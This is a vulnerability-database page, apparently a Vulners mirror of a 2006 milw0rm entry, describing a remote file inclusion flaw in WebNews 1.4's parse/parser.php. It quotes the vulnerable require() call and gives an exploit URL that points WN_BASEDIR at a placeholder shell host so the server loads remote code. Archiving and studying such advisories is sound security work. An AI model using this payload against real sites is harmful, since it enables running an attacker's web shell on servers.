Lucene search

K

WebNews 1.4 - parser.php Remote File Inclusion (1)

๐Ÿ—“๏ธย 26 Sep 2006ย 00:00:00Reported byย ThE-WoLf-KsATypeย 
exploitpack
ย exploitpack
๐Ÿ‘ย 6ย Views

WebNews version 1.4 parser.php Remote File Inclusio

Show more
Code
#==============================================================================================
#webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#
#
#Version : v1.4
#
#================================================================================================
#Bug in : parse/parser.php
#
#Vlu Code :
#--------------------------------
#
#            require($WN_BASEDIR."/parse/parser.php");
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#htpp://sitename.com[scerpitPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : ThE-WoLf-KsA
#
#Conatact : the-wolf-ksa[at]hotmail.com
#XP10_hackEr Team
#
#WWW.XP10.COM
==================================================================================================

vendor:
http://www.stylemotion.de/downloads-id1-web-news-1-4.html
/str0ke

# milw0rm.com [2006-09-26]

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Sep 2006 00:00Current
0.1Low risk
Vulners AI Score0.1
6
.json
Report